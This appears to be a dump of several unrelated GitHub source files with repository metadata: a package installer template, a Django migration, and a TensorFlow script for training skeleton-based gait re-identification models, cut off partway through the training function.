REMOVE_DELTA_ADDONS = "remove_delta_addons"
| [
"noreply@github.com"
] | home-assistant.noreply@github.com |
d336b48ca399ec97ad77e13b5706fb43d5df98f2 | 5e6fc89f578d368c81231fdd50693b5857042c3d | /template/setup.py | d3861b0996ffebdc86964e23c2bb6bd2c93d8dd1 | [
"Unlicense"
] | permissive | Ruthenic/rodder-repo | 9d14fe5fab278c6cc7f8c3a5a31abb4477c7f6ba | a80c4b8a6e032d0d1c21524caf7b91066575b25f | refs/heads/master | 2023-03-12T19:29:31.900411 | 2021-02-22T01:58:28 | 2021-02-22T01:58:28 | 322,481,514 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py | #PLEASE NOTE: THIS FORMAT IS NOT REQUIRED TO SUBMIT TO THE MAIN REPO, NOR IS IT REQUIRED FOR RODDER TO FUNCTION. THIS IS ONLY A TEMPLATE, USABLE WITH MOST PROGRAMS
#Thanks, Drake.
import subprocess,requests,tarfile,os,shutil
dlurl = '$DOWNLOAD_LINK' #this is where your download url
print(">< Downloading $PROGRAM_NAME...")
file = requests.get(dlurl)
with open(os.getenv('HOME') + '/.tmp/rodder/$DOWNLOADED_FILE', 'wb') as f:
f.write(file.content)
print(">< Extracting $PROGRAM_NAME...")
with tarfile.open(os.getenv('HOME') + '/.tmp/rodder/$DOWNLOADED_FILE', 'r') as f:
f.extractall(os.getenv('HOME') + '/.tmp/rodder')
print(">< Moving $PROGRAM_NAME to installation dir...")
shutil.move(os.getenv('HOME') + '/.tmp/rodder/$EXTRACTED_FOLDER_NAME', os.getenv('HOME') + '/.local/bin')
print(">< Adding $PROGRAM_NAME dir to $PATH")
with open(os.getenv('HOME') + '/.profile', 'a') as f:
f.write('export PATH=' + os.getenv('HOME') + '/.local/bin/$EXTRACTED_FOLDER_NAME:$PATH #Created by rodder')
print(">< Done!")
| [
"mdrakea3@tutanota.com"
] | mdrakea3@tutanota.com |
5b30c3f29fb8ebe39cfce369d37ef01a2df19ef6 | b4f42d5127b3b10303b4df0f0c57cc0e546a9bd0 | /rest/migrations/0026_auto_20200819_1700.py | 58b852e9ce6617b359ed35953a8eaea827b9c989 | [
"MIT"
] | permissive | narcotis/Welbot-V2 | 8ba14db2a2722cb6f907bb96018908ffe57b5999 | 7525216b61036f62d0be0b5ebb6d3476b73323c8 | refs/heads/master | 2022-12-16T16:08:38.465029 | 2020-09-09T20:08:01 | 2020-09-09T20:08:01 | 291,740,691 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | # Generated by Django 3.0.8 on 2020-08-19 08:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('rest', '0025_auto_20200819_1631'),
]
operations = [
migrations.AlterField(
model_name='culture_event',
name='kind',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='rest.Infrastructure'),
),
migrations.AlterField(
model_name='exhibition',
name='kind',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='rest.Infrastructure'),
),
migrations.DeleteModel(
name='Cul_facility',
),
]
| [
"qhguswkd@gmail.com"
] | qhguswkd@gmail.com |
5fc22fa8da5a8f032fb8fdb322bcdb4a0e26cda1 | 650df9246dd0338123ea6af35a5598bea33ba540 | /train.py | 76ed95d3590f48dfd55bf7f74df2d3c21c9213ae | [
"MIT"
] | permissive | 1suancaiyu/Locality-Awareness-SGE | 24f8259547ddff4d8bbd6a37313f07d1371b578e | 42f794ce1a3e1ed39c4b26a74deaa14af4a6d5e1 | refs/heads/master | 2023-04-08T18:39:33.501385 | 2021-04-25T08:32:12 | 2021-04-25T08:32:12 | 350,745,772 | 0 | 0 | MIT | 2021-03-23T14:36:45 | 2021-03-23T14:36:44 | null | UTF-8 | Python | false | false | 360,224 | py | import tensorflow as tf
from tensorflow.python.layers.core import Dense
import numpy as np
import time
import matplotlib as mpl
import copy
import os
from tensorflow.python.ops import rnn_cell_impl
# mpl.use('Agg')
# import matplotlib.pyplot as plt
import os
# Number of Epochs
epochs = 100
# Batch Size
batch_size = 128
# RNN Size k = 256
rnn_size = 256
# Number of Layers, 2-layer LSTM
num_layers = 2
# Time Steps of Input, f = 6 skeleton frames
time_steps = 6
# Length of Series, J = 20 body joints in a sequence
series_length = 20
# Learning Rate
learning_rate = 0.0005
lr_decay = 0.95
momentum = 0.5
lambda_l2_reg = 0.02
dataset = False
attention = False
manner = False
gpu = False
permutation_flag = False
permutation_test_flag = False
permutation_test_2_flag = False
permutation = 0
test_permutation = 0
test_2_permutation = 0
Reverse = True
use_attention = True
Bi_LSTM = False
AGEs = True
Frozen = False
tf.app.flags.DEFINE_string('attention', 'LA', "(LA) Locality-oriented Attention Alignment or BA (Basic Attention Alignment)")
tf.app.flags.DEFINE_string('manner', 'ap', "average prediction (ap) or sequence-level concatenation (sc)")
tf.app.flags.DEFINE_string('dataset', 'BIWI', "Dataset: BIWI or IAS or KGBD")
tf.app.flags.DEFINE_string('length', '6', "4, 6, 8 or 10")
# what is the length meaning?
# f denotes the sequence length
tf.app.flags.DEFINE_string('gpu', '0', "GPU number")
tf.app.flags.DEFINE_string('frozen', '0', "Freeze CAGEs for contrastive learning")
tf.app.flags.DEFINE_string('c_reid', '0', "Peform re-id use projection vectors")
tf.app.flags.DEFINE_string('t', '0.05', "Temperature for contrastive learning")
tf.app.flags.DEFINE_string('train_flag', '1', "Choose to train (1) or test (0)")
tf.app.flags.DEFINE_string('view', 'None', "Choose different views for KS20")
tf.app.flags.DEFINE_string('transfer', 'None', "Choose a dataset's encoding model to transfer encoding")
tf.app.flags.DEFINE_string('model', 'rev_rec', "prediction, sorting, rev_rec (Rev. Rec.), rev_rec_plus(Rev. Rec. Plus)")
FLAGS = tf.app.flags.FLAGS
config = tf.ConfigProto()
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
temperature = 0.1
config.gpu_options.allow_growth = True
view = 'view_'
transfer = 'None'
Model = 'rev_rec'
pre_task = 'rev_rec'
def main(_):
global attention, dataset, series_length, epochs, time_steps, gpu, manner, frames_ps, \
temperature, Frozen, C_reid, temperature, train_flag, view, use_attention, transfer, Model, pre_task
attention, dataset, gpu, manner, length, Frozen, C_reid, temperature, train_flag, \
view_num, transfer, Model = FLAGS.attention, \
FLAGS.dataset, FLAGS.gpu, FLAGS.manner, \
FLAGS.length, FLAGS.frozen, FLAGS.c_reid, \
FLAGS.t, FLAGS.train_flag, FLAGS.view, \
FLAGS.transfer, FLAGS.model,
if attention not in ['BA', 'LA']:
raise Exception('Attention must be BA or LA.')
if manner not in ['sc', 'ap']:
raise Exception('Training manner must be sc or ap.')
if dataset not in ['BIWI', 'IAS', 'KGBD', 'KinectReID', 'KS20']:
raise Exception('Dataset must be BIWI, IAS, KGBD, KinectReID or KS20.')
if not gpu.isdigit() or int(gpu) < 0:
raise Exception('GPU number must be a positive integer.')
if length not in ['4', '6', '8', '10']:
raise Exception('Length number must be 4, 6, 8 or 10.')
if Frozen not in ['0', '1']:
raise Exception('Frozen state must be 0 or 1.')
if C_reid not in ['0', '1']:
raise Exception('C_reid state must be 0 or 1.')
if train_flag not in ['0', '1', '2']:
raise Exception('Train_flag must be 0, 1, or 2 (Only Evaluation).')
if view_num not in ['0', '1', '2', '3', '4', 'None']:
raise Exception('View_num must be 0, 1, 2, 3, 4 or None')
if transfer not in ['BIWI', 'IAS', 'KGBD', 'KS20', 'None']:
raise Exception('Transfer dataset must be BIWI, IAS, KGBD, KS20 or None')
if Model not in ['rev_rec', 'rev_rec_plus', 'prediction', 'sorting']:
raise Exception('Model must be prediction, sorting, rev_rec or rev_rec_plus')
os.environ['CUDA_VISIBLE_DEVICES'] = gpu
folder_name = dataset + '_' + attention
series_length = 20
if dataset == 'KS20':
series_length = 25
view += view_num
if view_num == 'None':
view = ''
if transfer != 'None':
train_flag = '0'
# time_steps = 6
time_steps = int(length)
temperature = float(temperature)
pre_task = Model
# wsx
frames_ps = dataset + '/' + str(time_steps) + '/'
epochs = 400
if dataset != 'KS20':
view = ''
# if dataset == 'KGBD':
# epochs = 100
# Obtain CAGEs
# Train self-supervised gait encoding model on X, Y, Z
if dataset == 'KGBD':
temperature = 0.5
else:
temperature = 0.1
if Model == 'rev_rec_plus':
# rev_rec uses 'LA' and other two pretext tasks use 'BA'
attention = 'BA'
print(
' ## Dataset: %s\n ## Attention: %s\n ## Re-ID Manner: %s\n ## Sequence Length: %s\n ## Tempearture: %s\n ## Pretext Task: %s\n ## GPU: %s\n' %
(dataset, attention, manner, str(time_steps), str(temperature), Model, str(gpu)))
if train_flag == '1':
print(' ## Training Gait Encoding Model: True')
else:
print(' ## Training Gait Encoding Model: False')
print(' ## Training Recognition Network: True\n')
if train_flag == '1' and Model != 'rev_rec_plus':
try:
os.mkdir('./Models/Gait_Encoding_models')
except:
pass
folder_name = './Models/Gait_Encoding_models/' + folder_name
for i in ['x', 'y', 'z']:
try:
os.mkdir(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task)
except:
pass
train(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature)+ '_' + Frozen + view + 'pre_' + pre_task, i, train_dataset=dataset)
elif train_flag == '1' and Model == 'rev_rec_plus':
print(' ## Training Three Types of Gait Encoding Model: (1) Rev. Rec. (2) Prediction (3) Sorting, and Combine CAGEs to Train RN')
attention = 'LA'
folder_name = dataset + '_' + attention
try:
os.mkdir('./Models/Gait_Encoding_models')
except:
pass
folder_name = './Models/Gait_Encoding_models/' + folder_name
# Rev. Rec.
pre_task = 'rev_rec'
for i in ['x', 'y', 'z']:
try:
os.mkdir(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task)
except:
pass
train(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature)+ '_' + Frozen + view + 'pre_' + pre_task, i, train_dataset=dataset)
# Prediction
attention = 'BA'
folder_name = dataset + '_' + attention
folder_name = './Models/Gait_Encoding_models/' + folder_name
pre_task = 'prediction'
for i in ['x', 'y', 'z']:
try:
os.mkdir(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task)
except:
pass
train(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature)+ '_' + Frozen + view + 'pre_' + pre_task, i, train_dataset=dataset)
# Sorting
attention = 'BA'
folder_name = dataset + '_' + attention
folder_name = './Models/Gait_Encoding_models/' + folder_name
pre_task = 'sorting'
for i in ['x', 'y', 'z']:
try:
os.mkdir(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task)
except:
pass
train(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature)+ '_' + Frozen + view + 'pre_' + pre_task, i, train_dataset=dataset)
pre_task = 'rev_rec_plus'
print('Generate CAGEs')
if dataset == 'IAS':
X, X_y, t_X, t_X_y, t_2_X, t_2_X_y, t_X_att = encoder_classify(dataset + '_' + attention + 'x',
'x', 'att', dataset)
Y, Y_y, t_Y, t_Y_y, t_2_Y, t_2_Y_y, t_Y_att = encoder_classify(dataset + '_' + attention + 'y',
'y', 'att', dataset)
Z, Z_y, t_Z, t_Z_y, t_2_Z, t_2_Z_y, t_Z_att = encoder_classify(dataset + '_' + attention + 'z',
'z', 'att', dataset)
else:
X, X_y, t_X, t_X_y, t_X_att = encoder_classify(dataset + '_' + attention + 'x', 'x', 'att', dataset)
Y, Y_y, t_Y, t_Y_y, t_Y_att = encoder_classify(dataset + '_' + attention + 'y', 'y', 'att', dataset)
Z, Z_y, t_Z, t_Z_y, t_Z_att = encoder_classify(dataset + '_' + attention + 'z', 'z', 'att', dataset)
assert X_y.tolist() == Y_y.tolist() and Y_y.tolist() == Z_y.tolist()
assert t_X_y.tolist() == t_Y_y.tolist() and t_Y_y.tolist() == t_Z_y.tolist()
X = np.column_stack([X,Y,Z])
y = X_y
t_X = np.column_stack([t_X, t_Y, t_Z])
t_y = t_X_y
if dataset == 'IAS':
t_2_X = np.column_stack([t_2_X, t_2_Y, t_2_Z])
t_2_y = t_2_X_y
if train_flag == '0' or train_flag == '1':
# direct evaluation
print('Train a recognition network on CAGEs')
if dataset == 'IAS':
if Model == 'rev_rec_plus':
encoder_classify_union_directly_IAS(X, y, t_X, t_y, t_2_X, t_2_y, './Models/CAGEs_RN_models',
dataset + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + str(Frozen) + 'pre_' + Model,
dataset)
else:
encoder_classify_union_directly_IAS(X, y, t_X, t_y, t_2_X, t_2_y, './Models/CAGEs_RN_models',
dataset + '_' + attention + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + str(Frozen) + 'pre_' + Model, dataset)
else:
if Model == 'rev_rec_plus':
encoder_classify_union_directly(X,y,t_X,t_y,'./Models/CAGEs_RN_models',
dataset + '_RN_' + manner + '_' + str(time_steps) + '_' + str(temperature) + '_' + str(Frozen) + view + 'pre_' + Model, dataset)
else:
encoder_classify_union_directly(X, y, t_X, t_y, './Models/CAGEs_RN_models',
dataset + '_' + attention + '_RN_' + manner + '_' + str(
time_steps) + '_' + str(temperature) + '_' + str(
Frozen) + view + 'pre_' + Model, dataset)
print ('Dataset: %s' % dataset)
if dataset == 'KS20':
print ('View: %s' % view)
if Model == 'rev_rec_plus':
evaluate_reid('./Models/CAGEs_RN_models/' + dataset + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
else:
evaluate_reid('./Models/CAGEs_RN_models/' + dataset + '_' + attention + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
def get_inputs():
inputs = tf.placeholder(tf.float32, [batch_size, time_steps, series_length], name='inputs')
targets = tf.placeholder(tf.float32, [batch_size, time_steps, series_length], name='targets')
learning_rate = tf.Variable(0.001, trainable=False, dtype=tf.float32, name='learning_rate')
learning_rate_decay_op = learning_rate.assign(learning_rate * 0.5)
target_sequence_length = tf.placeholder(tf.int32, (None, ), name='target_sequence_length')
max_target_sequence_length = tf.reduce_max(target_sequence_length, name='max_target_len')
source_sequence_length = tf.placeholder(tf.int32, (None, ), name='source_sequence_length')
keep_prob = tf.placeholder(tf.float32, name='keep_prob')
return inputs, targets, learning_rate, learning_rate_decay_op, target_sequence_length, max_target_sequence_length, source_sequence_length, keep_prob
def get_data_KGBD(dimension, fr):
input_data = np.load('Datasets/'+ frames_ps +'KGBD_train_npy_data/source_' + dimension + '_KGBD_' + str(fr) + '.npy')
input_data = input_data.reshape([-1,time_steps, series_length])
# rev_rec
if Model == 'rev_rec' or Model == 'rev_rec_plus':
targets = np.load('Datasets/'+ frames_ps +'KGBD_train_npy_data/target_' + dimension + '_KGBD_' + str(fr) + '.npy')
targets = targets.reshape([-1,time_steps, series_length])
input_data = input_data.tolist()
targets = targets.tolist()
# prediction
elif Model == 'prediction':
targets = np.concatenate((input_data[1:,:,:], input_data[-1,:, :].reshape([1, time_steps, series_length])), axis=0)
# input_data = input_data[:-1]
input_data = input_data.tolist()
targets = targets.tolist()
# sorting
elif Model == 'sorting':
targets = copy.deepcopy(input_data)
for i in range(input_data.shape[0]):
permutation_ = np.random.permutation(time_steps)
input_data[i] = input_data[i, permutation_]
input_data = input_data.tolist()
targets = targets.tolist()
return input_data, targets
def get_data_KinectReID(dimension, fr):
input_data = np.load('Datasets/'+ frames_ps +'KinectReID_train_npy_data/source_' + dimension + '_KinectReID_' + str(fr) + '.npy')
input_data = input_data.reshape([-1,time_steps, series_length])
input_data = input_data.tolist()
targets = np.load('Datasets/'+ frames_ps +'KinectReID_train_npy_data/target_' + dimension + '_KinectReID_' + str(fr) + '.npy')
targets = targets.reshape([-1,time_steps, series_length])
targets = targets.tolist()
return input_data, targets
def get_data_KS20(dimension, fr):
global view
if view != '':
view_dir = view + '/'
else:
view_dir = ''
input_data = np.load('Datasets/'+ frames_ps + view_dir +'KS20_train_npy_data/source_' + dimension + '_KS20_' + str(fr) + '.npy')
input_data = input_data.reshape([-1,time_steps, series_length])
if Model == 'rev_rec' or Model == 'rev_rec_plus':
input_data = input_data.tolist()
targets = np.load('Datasets/'+ frames_ps + view_dir +'KS20_train_npy_data/target_' + dimension + '_KS20_' + str(fr) + '.npy')
targets = targets.reshape([-1,time_steps, series_length])
targets = targets.tolist()
# prediction
elif Model == 'prediction':
targets = np.concatenate((input_data[1:, :, :], input_data[-1, :, :].reshape([1, time_steps, series_length])),
axis=0)
# input_data = input_data[:-1]
input_data = input_data.tolist()
targets = targets.tolist()
# 2. permutation
elif Model == 'sorting':
targets = copy.deepcopy(input_data)
for i in range(input_data.shape[0]):
permutation_ = np.random.permutation(time_steps)
input_data[i] = input_data[i, permutation_]
input_data = input_data.tolist()
targets = targets.tolist()
return input_data, targets
def get_data_IAS(dimension, fr):
input_data = np.load('Datasets/'+ frames_ps +'IAS_train_npy_data/source_' + dimension + '_IAS_' + str(fr) + '.npy')
input_data = input_data.reshape([-1, time_steps, series_length])
if Model == 'rev_rec' or Model == 'rev_rec_plus':
input_data = input_data.tolist()
targets = np.load('Datasets/'+ frames_ps +'IAS_train_npy_data/target_' + dimension + '_IAS_' + str(fr) + '.npy')
targets = targets.reshape([-1,time_steps, series_length])
targets = targets.tolist()
# prediction
elif Model == 'prediction':
targets = np.concatenate((input_data[1:, :, :], input_data[-1, :, :].reshape([1, time_steps, series_length])),
axis=0)
# input_data = input_data[:-1]
input_data = input_data.tolist()
targets = targets.tolist()
# 2. sorting
elif Model == 'sorting':
targets = copy.deepcopy(input_data)
for i in range(input_data.shape[0]):
permutation_ = np.random.permutation(time_steps)
input_data[i] = input_data[i, permutation_]
input_data = input_data.tolist()
targets = targets.tolist()
return input_data, targets
# suancaiyu
def get_data_BIWI(dimension, fr):
print("wsx log: get_data_BIWI(dimension, fr)", "dim",dimension,'\t',"fr",'\t',fr)
input_data_dir = 'Datasets/' + frames_ps + 'BIWI_train_npy_data/source_' + dimension + '_BIWI_' + str(fr) + '.npy'
print(input_data_dir)
input_data = np.load('Datasets/' + frames_ps + 'BIWI_train_npy_data/source_' + dimension + '_BIWI_' + str(fr) + '.npy')
print("wsx log: frames_ps", frames_ps)
print("wsx log BIWI input_data shape",input_data.shape)
input_data = input_data.reshape([-1, time_steps, series_length])
print("wsx log BIWI input_data reshape",input_data.shape)
print("log: input_data[:3,:,:]-> \n",input_data[:3,:,:])
if Model == 'rev_rec' or Model == 'rev_rec_plus':
print("log: enter rev_rec")
input_data = input_data.tolist()
targets = np.load('Datasets/'+ frames_ps +'BIWI_train_npy_data/target_' + dimension + '_BIWI_' + str(fr) + '.npy')
print("log: targets shape",targets.shape)
targets = targets.reshape([-1,time_steps, series_length])
print("log: targets reshape",targets.shape)
print("log: targets[:3,:,:]-> \n",targets[:3,:,:])
targets = targets.tolist()
# prediction
elif Model == 'prediction':
targets = np.concatenate((input_data[1:, :, :], input_data[-1, :, :].reshape([1, time_steps, series_length])),
axis=0)
print("wsx log targets shape: ",targets.shape)
# input_data = input_data[:-1]
input_data = input_data.tolist()
print("wsx log input_data.tolist() len(input_data): ",len(input_data))
targets = targets.tolist()
print("wsx log targets tolist() len(targets): ",len(targets))
# 2. permutation
elif Model == 'sorting':
targets = copy.deepcopy(input_data)
for i in range(input_data.shape[0]):
permutation_ = np.random.permutation(time_steps)
input_data[i] = input_data[i, permutation_]
input_data = input_data.tolist()
targets = targets.tolist()
# t_input_data = np.load('Datasets/'+ frames_ps +'BIWI_test_npy_data/t_source_' + dimension + '_BIWI_' + str(fr) + '.npy')
# t_input_data = t_input_data.reshape([-1, time_steps, series_length])
# t_input_data = t_input_data.tolist()
# t_targets = np.load('Datasets/'+ frames_ps +'BIWI_test_npy_data/t_target_' + dimension + '_BIWI_' + str(fr) + '.npy')
# t_targets = t_targets.reshape([-1, time_steps, series_length])
# t_targets = t_targets.tolist()
# # return input_data, targets, t_input_data, t_targets
return input_data[:-len(input_data)//3], targets[:-len(input_data)//3], input_data[-len(input_data)//3:], targets[-len(input_data)//3:]
def pad_batch(batch_data, pad_int):
'''
padding the first skeleton of target sequence with zeros —— Z
transform the target sequence (1,2,3,...,f) to (Z,1,2,3,...,f-1) as input to decoder in training
parameters:
- batch_data
- pad_int: position (0)
'''
max_sentence = max([len(sentence) for sentence in batch_data])
return [sentence + [pad_int] * (max_sentence - len(sentence)) for sentence in batch_data]
def get_batches(targets, sources, batch_size, source_pad_int, target_pad_int):
for batch_i in range(0, len(sources) // batch_size):
start_i = batch_i * batch_size
sources_batch = sources[start_i:start_i + batch_size]
targets_batch = targets[start_i:start_i + batch_size]
# transform the target sequence (1,2,3,...,f) to (Z,1,2,3,...,f-1) as input to decoder in training
pad_sources_batch = np.array(pad_batch(sources_batch, source_pad_int))
pad_targets_batch = np.array(pad_batch(targets_batch, target_pad_int))
# record the lengths of sequence (not neccessary)
targets_lengths = []
for target in targets_batch:
targets_lengths.append(len(target))
source_lengths = []
for source in sources_batch:
source_lengths.append(len(source))
yield pad_targets_batch, pad_sources_batch, targets_lengths, source_lengths
def get_batches_plain(targets, sources, batch_size, source_pad_int, target_pad_int):
for batch_i in range(0, len(sources) // batch_size):
start_i = batch_i * batch_size
sources_batch = sources[start_i:start_i + batch_size]
targets_batch = sources[start_i:start_i + batch_size]
# transform the target sequence (1,2,3,...,f) to (Z,1,2,3,...,f-1) as input to decoder in training
pad_sources_batch = np.array(pad_batch(sources_batch, source_pad_int))
pad_targets_batch = np.array(pad_batch(targets_batch, target_pad_int))
# record the lengths of sequence (not neccessary)
targets_lengths = []
for target in targets_batch:
targets_lengths.append(len(target))
source_lengths = []
for source in sources_batch:
source_lengths.append(len(source))
yield pad_targets_batch, pad_sources_batch, targets_lengths, source_lengths
def GE(input_data, rnn_size, num_layers, source_sequence_length, encoding_embedding_size):
'''
Gait Encoder (GE)
Parameters:
- input_data: skeleton sequences (X,Y,Z series)
- rnn_size: 256
- num_layers: 2
- source_sequence_length:
- encoding_embedding_size: embedding size
'''
encoder_embed_input = input_data
def get_lstm_cell(rnn_size):
lstm_cell = tf.contrib.rnn.LSTMCell(rnn_size, initializer=tf.random_uniform_initializer(-0.1, 0.1, seed=2))
# if use_dropout:
# lstm_cell = tf.contrib.rnn.DropoutWrapper(lstm_cell, output_keep_prob=0.5)
return lstm_cell
if Bi_LSTM:
fw_cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell(rnn_size) for _ in range(num_layers)])
bw_cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell(rnn_size) for _ in range(num_layers)])
encoder_output, encoder_state = \
tf.nn.bidirectional_dynamic_rnn(fw_cell, bw_cell, encoder_embed_input, sequence_length=source_sequence_length, dtype=tf.float32)
weights = fw_cell.variables
# print(encoder_state)
# print('1')
# print(encoder_output)
# exit(1)
else:
cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell(rnn_size) for _ in range(num_layers)])
encoder_output, encoder_state = tf.nn.dynamic_rnn(cell, encoder_embed_input,
sequence_length=source_sequence_length, dtype=tf.float32)
weights = cell.variables
if Bi_LSTM:
# print(encoder_state)
# exit(1)
c_1 = encoder_state[1][1][0] + encoder_state[0][1][0]
h_1 = encoder_state[1][1][1] + encoder_state[0][1][1]
c_0 = encoder_state[1][0][0] + encoder_state[0][0][0]
h_0 = encoder_state[1][0][1] + encoder_state[0][0][1]
# bidirectional_rnn/fw/fw/transpose_1:0
# ReverseSequence: 0
return encoder_output[0], (rnn_cell_impl.LSTMStateTuple(c_0, h_0), rnn_cell_impl.LSTMStateTuple(c_1, h_1)), weights, source_sequence_length
else:
return encoder_output, encoder_state, weights, source_sequence_length
def GD(decoding_embedding_size, num_layers, rnn_size,
target_sequence_length, source_sequence_length, max_target_sequence_length, encoder_output, encoder_state, decoder_input):
'''
Gait Decoder (GD)
parameters:
- decoding_embedding_size: embedding size
- num_layers: 2
- rnn_size: 256
- target_sequence_length: 6
- max_target_sequence_length: 6
- encoder_state: gait encoded state
- decoder_input:
'''
decoder_embed_input = decoder_input
def get_decoder_cell(rnn_size):
decoder_cell = tf.contrib.rnn.LSTMCell(rnn_size,
initializer=tf.random_uniform_initializer(-0.1, 0.1, seed=2))
return decoder_cell
cell = tf.contrib.rnn.MultiRNNCell([get_decoder_cell(rnn_size) for _ in range(num_layers)])
if use_attention:
attention_mechanism = tf.contrib.seq2seq.LuongAttention(num_units=rnn_size, memory=encoder_output,
memory_sequence_length=source_sequence_length)
cell = tf.contrib.seq2seq.AttentionWrapper(cell=cell, attention_mechanism=attention_mechanism,
attention_layer_size=rnn_size, alignment_history=True, output_attention=True,
name='Attention_Wrapper')
# FC layer
output_layer = Dense(series_length,
use_bias=True,
kernel_initializer=tf.truncated_normal_initializer(mean=0.0, stddev=0.1))
with tf.variable_scope("decode"):
training_helper = tf.contrib.seq2seq.TrainingHelper(inputs=decoder_embed_input,
sequence_length=target_sequence_length,
time_major=False)
if not use_attention:
training_decoder = tf.contrib.seq2seq.BasicDecoder(cell,
training_helper,
encoder_state,
output_layer)
else:
decoder_initial_state = cell.zero_state(batch_size=batch_size, dtype=tf.float32).clone(
cell_state=encoder_state)
training_decoder = tf.contrib.seq2seq.BasicDecoder(cell,
training_helper,
initial_state=decoder_initial_state,
output_layer=output_layer,
)
training_decoder_output, training_decoder_state, _ = tf.contrib.seq2seq.dynamic_decode(training_decoder,
impute_finished=True,
maximum_iterations=max_target_sequence_length)
with tf.variable_scope("decode", reuse=True):
def initialize_fn():
finished = tf.tile([False], [batch_size])
start_inputs = decoder_embed_input[:, 0]
return (finished, start_inputs)
def sample_fn(time, outputs, state):
del time, state
return tf.constant([0] * batch_size)
def next_inputs_fn(time, outputs, state, sample_ids):
del sample_ids
finished = time >= tf.shape(decoder_embed_input)[1]
all_finished = tf.reduce_all(finished)
next_inputs = tf.cond(
all_finished,
lambda: tf.zeros_like(outputs),
lambda: outputs)
return (finished, next_inputs, state)
predicting_helper = tf.contrib.seq2seq.CustomHelper(initialize_fn=initialize_fn,
sample_fn=sample_fn,
next_inputs_fn=next_inputs_fn)
if not use_attention:
predicting_decoder = tf.contrib.seq2seq.BasicDecoder(cell,
predicting_helper,
encoder_state,
output_layer)
else:
decoder_initial_state = cell.zero_state(batch_size=batch_size, dtype=tf.float32).clone(
cell_state=encoder_state)
predicting_decoder = tf.contrib.seq2seq.BasicDecoder(cell,
predicting_helper,
initial_state=decoder_initial_state,
output_layer=output_layer)
predicting_decoder_output, predicting_decoder_state, _ = tf.contrib.seq2seq.dynamic_decode(predicting_decoder,
impute_finished=True,
maximum_iterations=max_target_sequence_length)
return training_decoder_output, predicting_decoder_output, training_decoder_state, predicting_decoder_state
#suancaiyu
def process_decoder_input(data, batch_size):
'''
transform the target sequence (1,2,3,...,f) to (Z,1,2,3,...,f-1) as input to decoder in training
'''
print("wsx log process_decoder_inut() enter")
print("wsx log data shape",data.shape)
ending = tf.strided_slice(data, [0, 0, 0], [batch_size, -1, series_length], [1, 1, 1])
print("wsx log ending shape",ending.shape)
print("wsx log series_length",series_length)
decoder_input = tf.concat([tf.fill([batch_size, time_steps, series_length], 0.), ending], 1)
print("wsx log decoder_input shape",decoder_input.shape)
return decoder_input
#suancaiyu
def encoder_decoder(input_data, targets, lr, target_sequence_length,
max_target_sequence_length, source_sequence_length,
encoder_embedding_size, decoder_embedding_size,
rnn_size, num_layers):
encoding_embedding_size = 128
decoding_embedding_size = 128
# suancaiyu
encoder_output, encoder_state, weights, source_sequence_length = GE(input_data,
rnn_size,
num_layers,
source_sequence_length,
encoding_embedding_size)
# suancaiyu
decoder_input = process_decoder_input(targets, batch_size)
lstm_weights_1 = tf.Variable(weights[0], dtype=tf.float32, name='lstm_weights_layer_1')
lstm_weights_2 = tf.Variable(weights[3], dtype=tf.float32, name='lstm_weights_layer_2')
training_decoder_output, predicting_decoder_output, training_state, predicting_state = GD(
decoding_embedding_size,
num_layers,
rnn_size,
target_sequence_length,
source_sequence_length,
max_target_sequence_length,
encoder_output,
encoder_state,
decoder_input)
if use_attention:
attention_matrices = training_state.alignment_history.stack()
return training_decoder_output, predicting_decoder_output, lstm_weights_1, lstm_weights_2, attention_matrices
else:
return training_decoder_output, predicting_decoder_output, lstm_weights_1, lstm_weights_2
def train(folder_name, dim, train_dataset=False):
print("wsx log: enter train() folder_name dim train_dataset",folder_name,'\t',dim,'\t',train_dataset)
global series_length, time_steps, dataset, attention, Frozen, epochs
if train_dataset == 'KGBD':
input_data_, targets_ = get_data_KGBD(dim, fr=time_steps)
epochs = 150
elif train_dataset == 'IAS':
input_data_, targets_ = get_data_IAS(dim, fr=time_steps)
elif train_dataset == 'BIWI':
input_data_, targets_, t_input_data_, t_targets_ = get_data_BIWI(dim, fr=time_steps)
elif train_dataset == 'KinectReID':
input_data_, targets_ = get_data_KinectReID(dim, fr=time_steps)
elif train_dataset == 'KS20':
input_data_, targets_ = get_data_KS20(dim, fr=time_steps)
else:
raise Error('No dataset is chosen!')
if not Reverse:
targets_ = copy.deepcopy(input_data_)
if train_dataset == 'BIWI':
t_targets_ = copy.deepcopy(t_input_data_)
train_graph = tf.Graph()
encoding_embedding_size = 128
decoding_embedding_size = 128
with train_graph.as_default():
input_data, targets, lr, lr_decay_op, target_sequence_length, max_target_sequence_length, source_sequence_length, keep_prob = get_inputs()
if use_attention:
training_decoder_output, predicting_decoder_output, lstm_weights_1, lstm_weights_2, attention_matrices = encoder_decoder(input_data,
targets,
lr,
target_sequence_length,
max_target_sequence_length,
source_sequence_length,
encoding_embedding_size,
decoding_embedding_size,
rnn_size,
num_layers)
else:
